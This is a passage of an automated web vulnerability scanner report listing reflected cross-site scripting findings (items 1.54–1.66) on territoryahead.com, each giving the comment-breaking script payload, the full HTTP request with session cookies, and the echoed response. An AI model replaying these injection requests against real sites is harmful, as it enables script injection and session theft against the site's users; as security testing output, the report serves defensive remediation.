GET /text/jsb4da4--><script>alert(1)</script>2a78501926d/displayfunctions.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:47 GMT
Server: Apache
ETag: "AAAAS53/At4"
Last-Modified: Wed, 02 Mar 2011 19:12:10 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: xKa4oqwSrRQAAE0Z@0wAAAAa
REDIRECT_SCRIPT_URL: /text/jsb4da4--><script>alert(1)</script>2a78501926d/displayfunctions.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/jsb4da4-->
...[SNIP]...

1.54. http://www.territoryahead.com/text/js/displayfunctions.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/js/displayfunctions.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload d345f--><script>alert(1)</script>4243aff53cb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/js/displayfunctions.jsd345f--><script>alert(1)</script>4243aff53cb HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:57 GMT
Server: Apache
ETag: "AAAAS53/BSr"
Last-Modified: Wed, 02 Mar 2011 19:12:12 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
er=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 5XjQVKwSrSgAAGQkseUAAAAa
REDIRECT_SCRIPT_URL: /text/js/displayfunctions.jsd345f--><script>alert(1)</script>4243aff53cb
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/js/displayfunctions.jsd345f-->
...[SNIP]...

1.55. http://www.territoryahead.com/text/js/jquery-1.5.1.min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/js/jquery-1.5.1.min.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload cee51--><script>alert(1)</script>87881568124 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /textcee51--><script>alert(1)</script>87881568124/js/jquery-1.5.1.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:27:13 GMT
Server: Apache
ETag: "AAAAS53/rcY"
Last-Modified: Wed, 02 Mar 2011 19:15:05 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62381737; Path=/; Expires=Wed, 16-Mar-2011 19:15:04 GMT
Set-Cookie: customer=92645867; Path=/; Expires=Thu, 28-Feb-2019 19:15:04 GMT
Set-Cookie: mmlID=68410088; Path=/; Expires=Thu, 28-Feb-2019 19:15:04 GMT
Set-Cookie: JSESSIONID=c1RnauRFdO8g; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
RECT_UNIQUE_ID: 5mfrXawSrSgAAGQisGUAAAAT
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /textcee51--><script>alert(1)</script>87881568124/js/jquery-1.5.1.min.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/textcee51-->
...[SNIP]...

1.56. http://www.territoryahead.com/text/js/jquery-1.5.1.min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/js/jquery-1.5.1.min.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 42049--><script>alert(1)</script>85b8a825579 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/js42049--><script>alert(1)</script>85b8a825579/jquery-1.5.1.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:18:13 GMT
Server: Apache
ETag: "AAAAS53/8tr"
Last-Modified: Wed, 02 Mar 2011 19:16:15 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62381836; Path=/; Expires=Wed, 16-Mar-2011 19:16:15 GMT
Set-Cookie: customer=92646026; Path=/; Expires=Thu, 28-Feb-2019 19:16:15 GMT
Set-Cookie: mmlID=68410143; Path=/; Expires=Thu, 28-Feb-2019 19:16:15 GMT
Set-Cookie: JSESSIONID=dUY9_9HSu3R5; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
T_UNIQUE_ID: xjj7H6wSrRQAAHbc-D8AAAAS
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /text/js42049--><script>alert(1)</script>85b8a825579/jquery-1.5.1.min.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/js42049-->
...[SNIP]...

1.57. http://www.territoryahead.com/text/js/jquery-1.5.1.min.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/js/jquery-1.5.1.min.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 86d5a--><script>alert(1)</script>8b488278074 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/js/jquery-1.5.1.min.js86d5a--><script>alert(1)</script>8b488278074 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.territoryahead.com

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:27:25 GMT
Server: Apache
ETag: "AAAAS53/9ni"
Last-Modified: Wed, 02 Mar 2011 19:16:19 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62381855; Path=/; Expires=Wed, 16-Mar-2011 19:16:19 GMT
Set-Cookie: customer=92646045; Path=/; Expires=Thu, 28-Feb-2019 19:16:19 GMT
Set-Cookie: mmlID=68410162; Path=/; Expires=Thu, 28-Feb-2019 19:16:19 GMT
Set-Cookie: JSESSIONID=dypnxLcnDSYf; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
SrSgAAF3TGMMAAAAs
REDIRECT_nokeepalive: 1
REDIRECT_ssl-unclean-shutdown: 1
REDIRECT_downgrade-1.0: 1
REDIRECT_force-response-1.0: 1
REDIRECT_SCRIPT_URL: /text/js/jquery-1.5.1.min.js86d5a--><script>alert(1)</script>8b488278074
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/js/jquery-1.5.1.min.js86d5a-->
...[SNIP]...

1.58. http://www.territoryahead.com/text/js/jquery.cycle.all.min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/js/jquery.cycle.all.min.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e6e8f--><script>alert(1)</script>4dd4fea7c94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /texte6e8f--><script>alert(1)</script>4dd4fea7c94/js/jquery.cycle.all.min.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:15 GMT
Server: Apache
ETag: "AAAAS53+46D"
Last-Modified: Wed, 02 Mar 2011 19:11:38 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: wr6aQ6wSrRQAAFhQzMgAAAA7
REDIRECT_SCRIPT_URL: /texte6e8f--><script>alert(1)</script>4dd4fea7c94/js/jquery.cycle.all.min.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/texte6e8f-->
...[SNIP]...

1.59. http://www.territoryahead.com/text/js/jquery.cycle.all.min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/js/jquery.cycle.all.min.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload e4838--><script>alert(1)</script>8bb0c9363f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/jse4838--><script>alert(1)</script>8bb0c9363f6/jquery.cycle.all.min.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:17 GMT
Server: Apache
ETag: "AAAAS53+5fK"
Last-Modified: Wed, 02 Mar 2011 19:11:40 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: wuLYKawSrRQAAG-6D30AAAAR
REDIRECT_SCRIPT_URL: /text/jse4838--><script>alert(1)</script>8bb0c9363f6/jquery.cycle.all.min.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/jse4838-->
...[SNIP]...

1.60. http://www.territoryahead.com/text/js/jquery.cycle.all.min.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/js/jquery.cycle.all.min.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload a84c1--><script>alert(1)</script>623c86cdf9f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/js/jquery.cycle.all.min.jsa84c1--><script>alert(1)</script>623c86cdf9f HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:20 GMT
Server: Apache
ETag: "AAAAS53+6ID"
Last-Modified: Wed, 02 Mar 2011 19:11:43 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
2379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: wwrI0awSrRQAAC9kmrQAAAAN
REDIRECT_SCRIPT_URL: /text/js/jquery.cycle.all.min.jsa84c1--><script>alert(1)</script>623c86cdf9f
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/js/jquery.cycle.all.min.jsa84c1-->
...[SNIP]...

1.61. http://www.territoryahead.com/text/js/sitedisplay.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/js/sitedisplay.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 22f59--><script>alert(1)</script>1498ec5cbb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text22f59--><script>alert(1)</script>1498ec5cbb8/js/sitedisplay.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:15:47 GMT
Server: Apache
ETag: "AAAAS53+jbL"
Last-Modified: Wed, 02 Mar 2011 19:10:10 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: vX-alawSrRQAAFi69mIAAACx
REDIRECT_SCRIPT_URL: /text22f59--><script>alert(1)</script>1498ec5cbb8/js/sitedisplay.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text22f59-->
...[SNIP]...

1.62. http://www.territoryahead.com/text/js/sitedisplay.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/js/sitedisplay.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 7c6fe--><script>alert(1)</script>ab2c0cac3d8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/js7c6fe--><script>alert(1)</script>ab2c0cac3d8/sitedisplay.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:24:58 GMT
Server: Apache
ETag: "AAAAS53+kBZ"
Last-Modified: Wed, 02 Mar 2011 19:10:12 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 3lNp9awSrSgAAB1MkM4AAAAZ
REDIRECT_SCRIPT_URL: /text/js7c6fe--><script>alert(1)</script>ab2c0cac3d8/sitedisplay.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/js7c6fe-->
...[SNIP]...

1.63. http://www.territoryahead.com/text/js/sitedisplay.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/js/sitedisplay.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 7c9ed--><script>alert(1)</script>d8f15372507 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/js/sitedisplay.js7c9ed--><script>alert(1)</script>d8f15372507 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:15:51 GMT
Server: Apache
ETag: "AAAAS53+kZo"
Last-Modified: Wed, 02 Mar 2011 19:10:14 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: vbzlhawSrRQAAG-7D1EAAAAT
REDIRECT_SCRIPT_URL: /text/js/sitedisplay.js7c9ed--><script>alert(1)</script>d8f15372507
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/js/sitedisplay.js7c9ed-->
...[SNIP]...

1.64. http://www.territoryahead.com/text/omniture/s_code.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/omniture/s_code.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 62698--><script>alert(1)</script>8076ec07611 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text62698--><script>alert(1)</script>8076ec07611/omniture/s_code.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:26 GMT
Server: Apache
ETag: "AAAAS53+5qY"
Last-Modified: Wed, 02 Mar 2011 19:11:41 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 45vQ3qwSrSgAAGR-5scAAAAH
REDIRECT_SCRIPT_URL: /text62698--><script>alert(1)</script>8076ec07611/omniture/s_code.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text62698-->
...[SNIP]...

1.65. http://www.territoryahead.com/text/omniture/s_code.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/omniture/s_code.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 74faf--><script>alert(1)</script>785d6938d76 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/omniture74faf--><script>alert(1)</script>785d6938d76/s_code.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:28 GMT
Server: Apache
ETag: "AAAAS53+6Hx"
Last-Modified: Wed, 02 Mar 2011 19:11:43 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 47iWaKwSrSgAAFMeKa0AAAFF
REDIRECT_SCRIPT_URL: /text/omniture74faf--><script>alert(1)</script>785d6938d76/s_code.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/omniture74faf-->
...[SNIP]...

1.66. http://www.territoryahead.com/text/omniture/s_code.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.territoryahead.com
Path:	/text/omniture/s_code.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 907ac--><script>alert(1)</script>6515f40b254 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/omniture/s_code.js907ac--><script>alert(1)</script>6515f40b254 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:34 GMT
Server: Apache
ETag: "AAAAS53+7fl"
Last-Modified: Wed, 02 Mar 2011 19:11:48 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
